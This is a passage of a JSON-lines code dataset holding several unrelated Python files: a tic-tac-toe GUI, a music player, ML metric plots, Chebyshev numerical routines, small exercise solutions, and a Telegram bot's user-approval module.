clusters\n best_km = km\n\nprint(f\"Best init: {best_km.init}\")\nprint(f\"Best n: {best_km.n_clusters}\")\nprint(f\"Best cost: {best_cost}\")\nprint(f\"Best clusters: {best_clusters}\")\n\n# t-SNE visualization\nplt.clf()\ntsne = TSNE(n_components=2, learning_rate=\"auto\", verbose=1)\nz = tsne.fit_transform(accident_mat)\nplt.figure(figsize=(20,20))\nplt.margins(0)\nplt.axis('off')\nfig = plt.scatter(\n z[:,0], z[:,1],\n c=clusters,\n cmap='hsv',\n alpha=0.8,\n s=20,\n lw=0,\n edgecolor='white'\n)\nfig.axes.get_xaxis().set_visible(False)\nfig.axes.get_yaxis().set_visible(False)\nplt.savefig(\"tsne.png\", transparent=False)\n\nprint(clusters)\n\n","repo_name":"jlashgar/CS7050-FinalProject","sub_path":"collision_analysis.py","file_name":"collision_analysis.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4836543089","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\n\r\nwindow=Tk()\r\n \r\nwindow.configure(background=\"light blue\")\r\nwindow.title(\"TIC-TAC-TOE-GAME\")\r\nl1=Label(window,text=\"Player1:-X\",font=('Times New Roman','12'))\r\nl1.grid(row=0,column=0)\r\nl2=Label(window,text=\"Player2:-0\",font=('Times New Roman','12'))\r\nl2.grid(row=0,column=2)\r\nl3=Label(window,text='Player1 turn ',font=('Times New Roman','12'))\r\nl3.grid(row=1,column=0)\r\n\r\nwin=1\r\nrunning=0\r\ngame=running\r\nchance=0\r\n\r\ndef click1():\r\n \r\n global chance\r\n global game\r\n if(game==running):\r\n if(b1['text']!=' '):\r\n messagebox.showinfo('Error','Already choosen')\r\n else:\r\n \r\n if(chance%2==0):\r\n b1['text']='X'\r\n l3['text']='Player2 turn'\r\n else:\r\n b1['text']='O'\r\n l3['text']='Player1 turn'\r\n Winner()\r\n result(chance)\r\n chance=chance+1\r\n\r\ndef click2():\r\n global chance\r\n global game\r\n 
if(game==running):\r\n if(b2['text']!=' '):\r\n messagebox.showinfo('Error','Already choosen')\r\n else:\r\n \r\n if(chance%2==0):\r\n b2['text']='X'\r\n l3['text']='Player2 turn'\r\n else:\r\n b2['text']='O'\r\n l3['text']='Player1 turn'\r\n Winner()\r\n result(chance)\r\n chance=chance+1\r\n\r\ndef click3():\r\n global chance\r\n global game\r\n if(game==running):\r\n if(b3['text']!=' '):\r\n messagebox.showinfo('Error','Already choosen')\r\n else:\r\n \r\n if(chance%2==0):\r\n b3['text']='X'\r\n l3['text']='Player2 turn'\r\n else:\r\n b3['text']='O'\r\n l3['text']='Player1 turn'\r\n Winner()\r\n result(chance)\r\n chance=chance+1\r\n\r\ndef click4():\r\n global chance\r\n global game\r\n if(game==running):\r\n if(b4['text']!=' '):\r\n messagebox.showinfo('Error','Already choosen')\r\n else:\r\n \r\n if(chance%2==0):\r\n b4['text']='X'\r\n l3['text']='Player2 turn'\r\n else:\r\n b4['text']='O'\r\n l3['text']='Player1 turn'\r\n Winner()\r\n result(chance)\r\n chance=chance+1\r\n\r\ndef click5():\r\n global chance\r\n global game\r\n if(game==running):\r\n if(b5['text']!=' '):\r\n messagebox.showinfo('Error','Already choosen')\r\n else:\r\n \r\n if(chance%2==0):\r\n b5['text']='X'\r\n l3['text']='Player2 turn'\r\n else:\r\n b5['text']='O'\r\n l3['text']='Player1 turn'\r\n Winner()\r\n result(chance)\r\n chance=chance+1\r\n\r\ndef click6():\r\n global chance\r\n global game\r\n if(game==running):\r\n if(b6['text']!=' '):\r\n messagebox.showinfo('Error','Already choosen')\r\n else:\r\n \r\n if(chance%2==0):\r\n b6['text']='X'\r\n l3['text']='Player2 turn'\r\n else:\r\n b6['text']='O'\r\n l3['text']='Player1 turn'\r\n Winner()\r\n result(chance)\r\n chance=chance+1\r\n\r\ndef click7():\r\n global chance\r\n global game\r\n if(game==running):\r\n if(b7['text']!=' '):\r\n messagebox.showinfo('Error','Already choosen')\r\n else:\r\n \r\n if(chance%2==0):\r\n b7['text']='X'\r\n l3['text']='Player2 turn'\r\n else:\r\n b7['text']='O'\r\n l3['text']='Player1 turn'\r\n Winner()\r\n result(chance)\r\n chance=chance+1\r\n\r\ndef click8():\r\n global chance\r\n global game\r\n if(game==running):\r\n if(b8['text']!=' '):\r\n messagebox.showinfo('Error','Already choosen')\r\n else:\r\n \r\n if(chance%2==0):\r\n b8['text']='X'\r\n l3['text']='Player2 turn'\r\n else:\r\n b8['text']='O'\r\n l3['text']='Player1 turn'\r\n Winner()\r\n result(chance)\r\n chance=chance+1\r\n\r\ndef click9():\r\n global chance\r\n global game\r\n if(game==running):\r\n if(b9['text']!=' '):\r\n messagebox.showinfo('Error','Already choosen')\r\n else:\r\n if(chance%2==0):\r\n b9['text']='X'\r\n l3['text']='Player2 turn'\r\n else:\r\n b9['text']='O'\r\n l3['text']='Player1 turn'\r\n Winner()\r\n result(chance)\r\n chance=chance+1\r\n\r\n \r\n\r\n \r\n\r\n\r\nb1 = Button(window, text=' ', font='Arial', bg='light green', fg='black', height=6, width=10, command=click1)\r\nb1.grid(row=3, column=0)\r\n\r\nb2 = Button(window, text=' ', font='Arial', bg='light green', fg='black', height=6, width=10, command=click2)\r\nb2.grid(row=3, column=1)\r\n\r\nb3 = Button(window, text=' ',font='Arial', bg='light green', fg='black', height=6, width=10, command=click3)\r\nb3.grid(row=3, column=2)\r\n\r\nb4 = Button(window, text=' ', font='Arial', bg='light green', fg='black', height=6, width=10, command= click4)\r\nb4.grid(row=4, column=0)\r\n\r\nb5 = Button(window, text=' ', font='Arial', bg='light green', fg='black', height=6, width=10, command=click5)\r\nb5.grid(row=4, column=1)\r\n\r\nb6 = Button(window, text=' ', font='Arial', bg='light green', 
fg='black', height=6, width=10, command=click6)\r\nb6.grid(row=4, column=2)\r\n\r\nb7 = Button(window, text=' ', font='Arial', bg='light green', fg='black', height=6, width=10, command=click7)\r\nb7.grid(row=5, column=0)\r\n\r\nb8 = Button(window, text=' ', font='Arial', bg='light green', fg='black', height=6, width=10, command=click8)\r\nb8.grid(row=5, column=1)\r\n\r\nb9 = Button(window, text=' ', font='Arial', bg='light green', fg='black', height=6, width=10, command=click9)\r\nb9.grid(row=5, column=2)\r\ndef Winner():\r\n global game\r\n if(b1['text']==b2['text'] and b2['text'] ==b3['text'] and b2['text']!=' '):\r\n game=win\r\n elif(b4['text']==b5['text'] and b5['text'] ==b6['text'] and b5['text']!=' '):\r\n game=win\r\n elif(b7['text']==b8['text'] and b8['text'] ==b9['text'] and b8['text']!=' '):\r\n game=win\r\n elif(b1['text']==b4['text'] and b4['text'] ==b7['text'] and b1['text']!=' '):\r\n game=win\r\n elif(b2['text']==b5['text'] and b5['text'] ==b8['text'] and b2['text']!=' '):\r\n game=win\r\n elif(b3['text']==b6['text'] and b6['text'] ==b9['text'] and b3['text']!=' '):\r\n game=win\r\n elif(b1['text']==b5['text'] and b5['text'] ==b9['text'] and b5['text']!=' '):\r\n game=win\r\n elif(b3['text']==b5['text'] and b5['text'] ==b7['text'] and b5['text']!=' '):\r\n game=win\r\n elif(b1['text']!=' ' and b2['text']!=' ' and b3['text']!=' ' and b4['text']!=' ' and b5['text']!=' ' and b6['text']!=' ' and b7['text']!=' ' and b8['text']!=' ' and b9['text']!=' '):\r\n game=-1\r\n else:\r\n game=running\r\n\r\ndef result(chance):\r\n global game\r\n if(game==1):\r\n if(chance%2==0):\r\n messagebox.showinfo('Result','Player 1 won!!!')\r\n else:\r\n messagebox.showinfo('Result','Player 2 won!!!')\r\n elif(game==-1):\r\n messagebox.showinfo('Result','Its a tie!!!')\r\n\r\n\r\n\r\nwindow.mainloop()\r\n \r\n","repo_name":"ShivaPrasadhegde101/tic_tac_toe_gui","sub_path":"tic_tac_toe_gui.py","file_name":"tic_tac_toe_gui.py","file_ext":"py","file_size_in_byte":7407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1546229301","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve, precision_recall_curve\n\n\ndef plot_precision_recall(y_true, y_score, title='Precision-recall curve'):\n plt.title(title)\n plt.ylabel('Precision: tp/(tp+fp)')\n plt.xlabel('Recall (true positive rate): tp/(tp+fn)')\n precision, recall, thresholds = precision_recall_curve(y_true, y_score)\n plt.plot(recall, precision)\n\n\ndef plot_roc(y_true, y_score, title='ROC curve'):\n plt.title(title)\n plt.xlabel('False positive rate: fp/(fp+tn)')\n plt.ylabel('True positive rate (recall): tp/(tp+fn)')\n fpr, tpr, thresholds = roc_curve(y_true, y_score)\n plt.plot(fpr, tpr)\n\n\ndef plot_precision_vs_score(y_true, y_score, title='Precision vs score'):\n plt.title(title)\n plt.xlabel('Score threshold')\n plt.ylabel('Precision: tp/(tp+fp)')\n precision, recall, thresholds = precision_recall_curve(y_true, y_score)\n plt.plot(thresholds, precision[:-1])\n\n\ndef precision_at_score_percentile(y_true, y_score, pctile=90, max_pctile=100):\n y_true = np.ravel(y_true)\n y_score = np.ravel(y_score)\n ys = y_true[(y_score >= np.percentile(y_score, pctile)) & (y_score <= np.percentile(y_score, max_pctile))]\n count = len(ys)\n if count == 0:\n return 0\n return np.sum(ys) / count\n\n\ndef precision_by_score_buckets(y_true, y_score, n_buckets=100):\n y_true = np.ravel(y_true)\n y_score = np.ravel(y_score)\n y_true_sorted = 
y_true[np.argsort(y_score)]\n chunks = np.array_split(y_true_sorted, n_buckets)\n sums = np.array([sum(x) for x in chunks])\n counts = np.array([len(x) for x in chunks])\n return sums / counts\n\n\ndef plot_precision_by_score_buckets(y_true, y_score, n_buckets=100, title='Precision by score bucket'):\n precs = precision_by_score_buckets(y_true, y_score, n_buckets)\n plt.plot(precs, marker='o', linestyle='')\n plt.title(title)\n\n\ndef plot_bucket_counts(y_true, y_score, bucketsize=100):\n nbuckets = int(len(y_true) / bucketsize)\n counts = bucketsize * precision_by_score_buckets(y_true, y_score, nbuckets)\n bucket_avg = bucketsize * (sum(y_true) / len(y_true))\n plt.plot(counts, marker='o', linestyle='')\n plt.plot([0, nbuckets], [bucket_avg, bucket_avg], '--')\n plt.xlabel('Buckets of %d ordered by score' % bucketsize)\n plt.ylabel('True positive count per bucket')\n plt.title('Predictions ranked by score, buckets of %d' % bucketsize)\n\n","repo_name":"wleftwich/rr-recruiting-ml","sub_path":"metric_utils.py","file_name":"metric_utils.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34473591257","text":"import os\r\nimport tkinter as tk\r\nfrom tkinter import filedialog\r\nimport pygame\r\n\r\n\r\nclass MusicPlayer:\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.title(\"Music Player\")\r\n\r\n self.playlist = []\r\n self.current_index = 0\r\n self.paused = False\r\n\r\n pygame.init()\r\n\r\n self.create_ui()\r\n self.root.mainloop()\r\n\r\n def create_ui(self):\r\n # Create buttons\r\n self.btn_load = tk.Button(\r\n self.root, text=\"Load Songs\", command=self.load_songs\r\n )\r\n self.btn_play = tk.Button(\r\n self.root, text=\"Play\", state=tk.DISABLED, command=self.play_music\r\n )\r\n self.btn_pause = tk.Button(\r\n self.root, text=\"Pause\", state=tk.DISABLED, command=self.pause_music\r\n )\r\n self.btn_stop = tk.Button(\r\n self.root, text=\"Stop\", state=tk.DISABLED, command=self.stop_music\r\n )\r\n\r\n # Create label for current song\r\n self.lbl_current_song = tk.Label(self.root, text=\"No song loaded\")\r\n\r\n # Position buttons and label\r\n self.btn_load.pack(pady=20)\r\n self.btn_play.pack(pady=10)\r\n self.btn_pause.pack(pady=10)\r\n self.btn_stop.pack(pady=10)\r\n self.lbl_current_song.pack(pady=20)\r\n\r\n def load_songs(self):\r\n # Clear the current playlist\r\n self.playlist.clear()\r\n\r\n # Open a file dialog to select multiple audio files\r\n files = filedialog.askopenfilenames(\r\n initialdir=\"/\", title=\"Select Songs\", filetypes=((\"Audio Files\", \"*.mp3\"), (\"All Files\", \"*.*\"))\r\n )\r\n\r\n # Add selected files to the playlist\r\n for file in files:\r\n self.playlist.append(file)\r\n\r\n if self.playlist:\r\n self.btn_play.config(state=tk.NORMAL)\r\n self.lbl_current_song.config(text=\"Loaded {} songs\".format(len(self.playlist)))\r\n\r\n def play_music(self):\r\n if pygame.mixer.music.get_busy():\r\n pygame.mixer.music.unpause()\r\n else:\r\n self.load_song_from_playlist()\r\n\r\n def pause_music(self):\r\n pygame.mixer.music.pause()\r\n self.paused = True\r\n\r\n def stop_music(self):\r\n pygame.mixer.music.stop()\r\n self.paused = False\r\n\r\n def load_song_from_playlist(self):\r\n if self.current_index < len(self.playlist):\r\n current_song = self.playlist[self.current_index]\r\n pygame.mixer.music.load(current_song)\r\n pygame.mixer.music.play()\r\n self.lbl_current_song.config(text=\"Now playing: 
{}\".format(os.path.basename(current_song)))\r\n self.btn_pause.config(state=tk.NORMAL)\r\n self.btn_stop.config(state=tk.NORMAL)\r\n self.current_index += 1\r\n else:\r\n self.lbl_current_song.config(text=\"No more songs in the playlist\")\r\n self.btn_play.config(state=tk.DISABLED)\r\n self.btn_pause.config(state=tk.DISABLED)\r\n self.btn_stop.config(state=tk.DISABLED)\r\n\r\n\r\n# Create the main window\r\nroot = tk.Tk()\r\nroot.geometry(\"300x200\")\r\n\r\n# Create an instance of the MusicPlayer\r\nmusic_player = MusicPlayer(root)\r\n","repo_name":"AnakhaRMenon/CodeClause_project_name","sub_path":"CODE CLAUSE/Music Player/MusicPlayer.py","file_name":"MusicPlayer.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40115489657","text":"meu_arquivo = open('times.txt', 'r', encoding=\"utf8\")\n\nlista = []\nfor linha in meu_arquivo:\n lista.append(linha.rstrip())\n\njogos=[]\nfor rodada in range(len(lista)):\n for partida in range(rodada+1, len(lista)):\n jogos.append(lista[rodada] + ' X '+ lista[partida])\n \n\nprint(jogos)\n\n\nmeu_arquivo.close\n \n \n","repo_name":"matteovar/Python","sub_path":"Leitura- Questao2).py","file_name":"Leitura- Questao2).py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12668795575","text":"#https://www.acmicpc.net/problem/7568\n\"\"\"\nn개의 인원의 몸무게와 키를 입력받고\n만약 자신의 몸무게와 키가 ���른 사람의 몸무게와 키보다 크다면\n내가 더 덩치가 큰 것으로 계산한다.\n\n알고리즘 설명\n1. 받은 값들을 리스트의 2차원 배열로 저장한다.\n2. 기준 값을 설정한다. 기준 값은 한명씩 돌아가면서 해야하기 때문에\n for문을 리스트의 길이로 설정한다.\n 기준 값은 받은 리스트에서 맨 앞에 값을 pop을 해서 빼낸다.\n3. 기준값과 기준값이 빠진 기존 리스트의 값들을 처음부터 하나씩 비교한다.\n 만약 기준값과 리스트에서 빼온 값끼리 서로 비교했을 때\n 키와 몸무게가 빼온 값이 더 작으면 count+=1을 한다\n4. 한 사이클이 종료되면 big_list라는 count의 값을 담는 리스트에\n count 값을 추가한다. 이것은 나중에 등수를 지정하는 리스트로 이용한다.\n5. 모든 사이클이 종료되면 이제 등수를 설정해야한다.\n big_list의 값을 하나씩 비교한다. big_list[0]과 big_list[0], big_list[0]과 big_list[1] ....\n6. 만약 big_list[i] > big_list[j] 라면 자신의 덩치가 더 작은것이니 rank += 1을 하면 된다.\n7. 최종적으로 rank가 담긴 list를 반환하면 된다.\n\"\"\"\n\npeople_num = int(input())\npeople_info_list = []\nbig_list = []\nfor i in range(people_num):\n a = list(map(int,input().split(\" \")))\n people_info_list.append(list(a))\n\n#1개의 기준 리스트와, 나머지 리스트들의 원소를 다 꺼냄\nfor i in range(people_num):\n temp = people_info_list.pop(0)\n count = 1\n for k in range(len(people_info_list)):\n if temp[0] < people_info_list[k][0] and temp[1] < people_info_list[k][1]:\n count+=1\n people_info_list.append(temp)\n big_list.append(count)\n\n\nprint(*big_list)\n","repo_name":"WhiteChaplin/baekjoon","sub_path":"브루탈포스/덩치.py","file_name":"덩치.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"86335499211","text":"import numpy as np\nfrom scipy.sparse import diags\n\ndef clencurt(Np1, a, b):\n \"\"\"\n Clenshaw-curtis nodes cpts and weights cwts,\n i.e. the Chebyshev points of the second kind, and\n associated weights. 
These are such that\n f(cpts) \\cdot cwts = \\int_a^b f(x) dx (they are rescaled to [a,b])\n The implementation follows that given in ATAP by Trefethen\n \n Parameters:\n Np1 - number of Chebyshev points and weights\n a, b - left and right endpoints for interval [a,b]\n\n Returns:\n cpts - Chebyshev points of the second kind on [a,b]\n cwts - clenshaw-curtis quadrature weights \n \"\"\"\n N = Np1 - 1; H = (b - a) / 2; bpad2 = (b + a) / 2;\n v = np.zeros((N-1,), dtype = np.double)\n cpts = np.zeros((Np1,), dtype = np.double)\n cwts = np.zeros((Np1,), dtype = np.double)\n if N % 2:\n w1 = H / (N * N); end = int((N - 1) / 2 + 1)\n else:\n w1 = H / (N * N - 1); end = int(N / 2)\n # compute cheb points\n cpts = H * np.cos(np.pi * np.arange(0,Np1) / N) + bpad2 \n # now do weights\n cwts[0] = w1; cwts[N] = w1;\n v[0:N] = 1.0; iis = np.arange(1, N)\n for k in range(1, end):\n v -= 2 * np.cos(2.0 * k * np.pi * iis / N) / (4.0 * k * k - 1.0)\n if N % 2 == 0:\n v -= np.cos(N * np.pi * iis / N) / (N * N -1)\n cwts[1:N] = 2 * H * v / N \n return cpts, cwts \n\ndef chebCoeffDiff(fhat, Nx, Ny, Nz, dof, H):\n \"\"\"\n Compute the Fourier-Chebyshev coefficients of the \n z-derivative of fhat.\n \n Parameters:\n fhat (complex) - Fourier-Chebyshev coefficients of grid\n function f, given sampling on a Chebyshev \n grid in z, and uniform in x,y. This is the\n combined real and complex part, i.e.\n fhat = fhat_r + 1j * fhat_i\n Nx,Ny,Nz - number of points in x,y,z\n dof - degrees of freedom of fhat (num components of vec field)\n H - (b-a)/2 for z \\in [a,b]\n \n Returns:\n Df (complex) - Fourier-Chebyshev coefficients of dfhat/dz. \n This the combined real and complex part\n \n \"\"\"\n Df = np.zeros((Nz, Ny, Nx, dof), dtype = np.complex) \n fhat_rs = np.reshape(fhat, (Nz, Ny, Nx, dof))\n Df[-2,:,:,:] = 2 / H * (Nz - 1) * fhat_rs[-1,:,:,:] \n for j in range(2,Nz):\n Df[Nz-j-1,:,:,:] = Df[Nz-j+1,:,:,:] + 2 / H * (Nz - j) * fhat_rs[Nz-j,:,:,:]\n Df[0,:,:,:] /= 2\n return Df\n\ndef chebCoeffDiff_perm(fhat, Nx, Ny, Nz, dof, H):\n \"\"\"\n Compute the Fourier-Chebyshev coefficients of the \n z-derivative of fhat for permuted layout.\n \n Parameters:\n fhat (complex) - Fourier-Chebyshev coefficients of grid\n function f, given sampling on a Chebyshev \n grid in z, and uniform in x,y. This is the\n combined real and complex part, i.e.\n fhat = fhat_r + 1j * fhat_i\n Nx,Ny,Nz - number of points in x,y,z\n dof - degrees of freedom of fhat (num components of vec field)\n H - (b-a)/2 for z \\in [a,b]\n \n Returns:\n Df (complex) - Fourier-Chebyshev coefficients of dfhat/dz. 
\n This the combined real and complex part\n \n \"\"\"\n Df = np.zeros((Ny, Nx, Nz, dof), dtype = np.complex) \n fhat_rs = np.reshape(fhat, (Ny, Nx, Nz, dof))\n Df[:,:,-2,:] = 2 / H * (Nz - 1) * fhat_rs[:,:,-1,:] \n for j in range(2,Nz):\n Df[:,:,Nz-j-1,:] = Df[:,:,Nz-j+1,:] + 2 / H * (Nz - j) * fhat_rs[:,:,Nz-j,:]\n Df[:,:,0,:] /= 2\n return Df\n \ndef precomputeInts(Nz, H):\n \"\"\"\n Precompute the integrals for the Nz Chebyshev modes that come up in\n the null-space A_p, A_x, A_y values for the pressure and velocity\n DP BVP solve\n \n Parameters:\n Nz - number of points on the z grid\n H - (b-a)/2 for z \\in [a,b]\n \n Returns:\n pints - precomputed integrals of Chebyshev polynomials \n for pressure correction\n uvints - precomputed integrals of Chebyshev polynomials\n for velocity correctionj\n \"\"\"\n theta = np.pi * np.arange(0,1000).reshape(-1, 1) / 999\n _, zwts = clencurt(1000, 0, 2 * H)\n zwts = np.reshape(zwts, (1, -1))\n pints = np.dot(zwts, (np.cos(np.arange(0, Nz) * theta)))\n uvints = H * np.dot(zwts, (np.cos(np.arange(0, Nz) * theta) * np.cos(theta)))\n return pints, uvints\n\ndef firstIntegralMatrix(N, H):\n \"\"\"\n Compute the first Chebyshev integration matrix. This maps\n Chebyshev coefficients of a function to the coefficients\n of the integral of the function\n \n Parameters:\n N - number of Chebyshev points\n H - (b-a)/2 for a Chebyshev grid [a,b]\n\n Returns:\n FIMat - the first Chebyshev integral matrix, scaled by H\n \"\"\"\n jj = np.arange(2,N)\n colm1 = np.concatenate(([1], 1 / (2 * jj)))\n colp1 = np.concatenate(([0, -1 / 2], -1 / (2 * jj) * (jj < N - 1)))\n FIMat = diags([colm1, colp1], [-1, 1], shape = (N, N+2)).toarray(order='F')\n FIMat[0,N+1] = 1\n return H * FIMat\n\ndef secondIntegralMatrix(N, H):\n \"\"\"\n Compute the second Chebyshev integration matrix. This maps\n Chebyshev coefficients of a function to the coefficients\n of the second integral of the function\n \n Parameters:\n N - number of Chebyshev points\n H - (b-a)/2 for a Chebyshev grid [a,b]\n\n Returns:\n SIMat - the second Chebyshev integral matrix, scaled by H^2\n \"\"\"\n\n jj = np.arange(3, N)\n colm2 = np.concatenate(([0.25], 1 / (2 * jj * (2 * jj - 2))))\n colp2 = np.concatenate(([0, 0.125, 1./24.], 1 / (2 * jj * (2 * jj + 2)) * (jj < N - 2)))\n col0 = np.concatenate(([0, -0.125, -1. / 8. - 1. 
/ 24.], -1 / (2 * jj * (2 * jj - 2)) \\\n - 1 / (2 * jj * (2 * jj + 2)) * (jj < N - 1))) \n SIMat = diags([colm2, col0, colp2], [-2, 0, 2], shape = (N,N+2)).toarray(order='F')\n SIMat[0,N] = 1; SIMat[1,N+1] = 1;\n return H**2 * SIMat\n","repo_name":"stochasticHydroTools/DoublyPeriodicStokes","sub_path":"source/cpu/python/Chebyshev.py","file_name":"Chebyshev.py","file_ext":"py","file_size_in_byte":5626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74392138706","text":"import html\n\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, ParseMode, Update\nfrom telegram.error import BadRequest\nfrom telegram.ext import CallbackContext, CallbackQueryHandler\nfrom telegram.utils.helpers import mention_html\n\nimport NekoRobot.modules.sql.approve_sql as sql\nfrom NekoRobot import DRAGONS, NEKO_PTB\nfrom NekoRobot.modules.disable import DisableAbleCommandHandler\nfrom NekoRobot.modules.helper_funcs.chat_status import user_admin\nfrom NekoRobot.modules.helper_funcs.extraction import extract_user\nfrom NekoRobot.modules.log_channel import loggable\n\n\n@loggable\n@user_admin\ndef approve(update, context):\n message = update.effective_message\n chat_title = message.chat.title\n chat = update.effective_chat\n args = context.args\n user = update.effective_user\n user_id = extract_user(message, args)\n if not user_id:\n message.reply_text(\n \"I don't know who you're talking about, you're going to need to specify a user!\"\n )\n return \"\"\n try:\n member = chat.get_member(user_id)\n except BadRequest:\n return \"\"\n if member.status in [\"administrator\", \"creator\"]:\n message.reply_text(\n \"User is already admin - locks, blocklists, and antiflood already don't apply to them.\"\n )\n return \"\"\n if sql.is_approved(message.chat_id, user_id):\n message.reply_text(\n f\"[{member.user['first_name']}](tg://user?id={member.user['id']}) is already approved in {chat_title}\",\n parse_mode=ParseMode.MARKDOWN,\n )\n return \"\"\n sql.approve(message.chat_id, user_id)\n message.reply_text(\n f\"[{member.user['first_name']}](tg://user?id={member.user['id']}) has been approved in {chat_title}! 
They will now be ignored by automated admin actions like locks, blocklists, and antiflood.\",\n parse_mode=ParseMode.MARKDOWN,\n )\n return f\"{html.escape(chat.title)}:\\n#APPROVED\\nAdmin: {mention_html(user.id, user.first_name)}\\nUser: {mention_html(member.user.id, member.user.first_name)}\"\n\n\n@loggable\n@user_admin\ndef disapprove(update, context):\n message = update.effective_message\n chat_title = message.chat.title\n chat = update.effective_chat\n args = context.args\n user = update.effective_user\n user_id = extract_user(message, args)\n if not user_id:\n message.reply_text(\n \"I don't know who you're talking about, you're going to need to specify a user!\"\n )\n return \"\"\n try:\n member = chat.get_member(user_id)\n except BadRequest:\n return \"\"\n if member.status in [\"administrator\", \"creator\"]:\n message.reply_text(\"This user is an admin, they can't be unapproved.\")\n return \"\"\n if not sql.is_approved(message.chat_id, user_id):\n message.reply_text(f\"{member.user['first_name']} isn't approved yet!\")\n return \"\"\n sql.disapprove(message.chat_id, user_id)\n message.reply_text(\n f\"{member.user['first_name']} is no longer approved in {chat_title}.\"\n )\n return f\"{html.escape(chat.title)}:\\n#UNAPPROVED\\nAdmin: {mention_html(user.id, user.first_name)}\\nUser: {mention_html(member.user.id, member.user.first_name)}\"\n\n\n@user_admin\ndef approved(update, context):\n message = update.effective_message\n chat_title = message.chat.title\n chat = update.effective_chat\n msg = \"The following users are approved.\\n\"\n approved_users = sql.list_approved(message.chat_id)\n for i in approved_users:\n member = chat.get_member(int(i.user_id))\n msg += f\"- `{i.user_id}`: {member.user['first_name']}\\n\"\n if msg.endswith(\"approved.\\n\"):\n message.reply_text(f\"No users are approved in {chat_title}.\")\n return \"\"\n else:\n message.reply_text(msg, parse_mode=ParseMode.MARKDOWN)\n\n\n@user_admin\ndef approval(update, context):\n message = update.effective_message\n chat = update.effective_chat\n args = context.args\n user_id = extract_user(message, args)\n member = chat.get_member(int(user_id))\n if not user_id:\n message.reply_text(\n \"I don't know who you're talking about, you're going to need to specify a user!\"\n )\n return \"\"\n if sql.is_approved(message.chat_id, user_id):\n message.reply_text(\n f\"{member.user['first_name']} is an approved user. Locks, antiflood, and blocklists won't apply to them.\"\n )\n else:\n message.reply_text(\n f\"{member.user['first_name']} is not an approved user. They are affected by normal commands.\"\n )\n\n\ndef unapproveall(update: Update, context: CallbackContext):\n chat = update.effective_chat\n user = update.effective_user\n member = chat.get_member(user.id)\n if member.status != \"creator\" and user.id not in DRAGONS:\n update.effective_message.reply_text(\n \"Only the chat owner can unapprove all users at once.\"\n )\n else:\n buttons = InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Unapprove all users\", callback_data=\"unapproveall_user\"\n )\n ],\n [\n InlineKeyboardButton(\n text=\"Cancel\", callback_data=\"unapproveall_cancel\"\n )\n ],\n ]\n )\n update.effective_message.reply_text(\n f\"Are you sure you would like to unapprove ALL users in {chat.title}? 
This action cannot be undone.\",\n reply_markup=buttons,\n parse_mode=ParseMode.MARKDOWN,\n )\n\n\ndef unapproveall_btn(update: Update, context: CallbackContext):\n query = update.callback_query\n chat = update.effective_chat\n message = update.effective_message\n member = chat.get_member(query.from_user.id)\n if query.data == \"unapproveall_user\":\n if member.status == \"creator\" or query.from_user.id in DRAGONS:\n approved_users = sql.list_approved(chat.id)\n users = [int(i.user_id) for i in approved_users]\n for user_id in users:\n sql.disapprove(chat.id, user_id)\n\n if member.status == \"administrator\":\n query.answer(\"Only owner of the chat can do this.\")\n\n if member.status == \"member\":\n query.answer(\"You need to be admin to do this.\")\n elif query.data == \"unapproveall_cancel\":\n if member.status == \"creator\" or query.from_user.id in DRAGONS:\n message.edit_text(\"Removing of all approved users has been cancelled.\")\n return \"\"\n if member.status == \"administrator\":\n query.answer(\"Only owner of the chat can do this.\")\n if member.status == \"member\":\n query.answer(\"You need to be admin to do this.\")\n\n\n__help__ = \"\"\"\nSometimes, you might trust a user not to send unwanted content.\nMaybe not enough to make them admin, but you might be ok with locks, blacklists, and antiflood not applying to them.\n\nThat's what approvals are for - approve of trustworthy users to allow them to send \n\n*Admin commands:*\n- `/approval`*:* Check a user's approval status in this chat.\n- `/approve`*:* Approve of a user. Locks, blacklists, and antiflood won't apply to them anymore.\n- `/unapprove`*:* Unapprove of a user. They will now be subject to locks, blacklists, and antiflood again.\n- `/approved`*:* List all approved users.\n- `/unapproveall`*:* Unapprove *ALL* users in a chat. 
This cannot be undone.\n\"\"\"\n\nAPPROVE = DisableAbleCommandHandler(\"approve\", approve, run_async=True)\nDISAPPROVE = DisableAbleCommandHandler(\"unapprove\", disapprove, run_async=True)\nAPPROVED = DisableAbleCommandHandler(\"approved\", approved, run_async=True)\nAPPROVAL = DisableAbleCommandHandler(\"approval\", approval, run_async=True)\nUNAPPROVEALL = DisableAbleCommandHandler(\"unapproveall\", unapproveall, run_async=True)\nUNAPPROVEALL_BTN = CallbackQueryHandler(\n unapproveall_btn, pattern=r\"unapproveall_.*\", run_async=True\n)\n\nNEKO_PTB.add_handler(APPROVE)\nNEKO_PTB.add_handler(DISAPPROVE)\nNEKO_PTB.add_handler(APPROVED)\nNEKO_PTB.add_handler(APPROVAL)\nNEKO_PTB.add_handler(UNAPPROVEALL)\nNEKO_PTB.add_handler(UNAPPROVEALL_BTN)\n\n__mod_name__ = \"Approvals\"\n__command_list__ = [\"approve\", \"unapprove\", \"approved\", \"approval\"]\n__handlers__ = [APPROVE, DISAPPROVE, APPROVED, APPROVAL]\n","repo_name":"Awesome-Prince/NekoRobot-3","sub_path":"NekoRobot/modules/approve.py","file_name":"approve.py","file_ext":"py","file_size_in_byte":8360,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"48"} 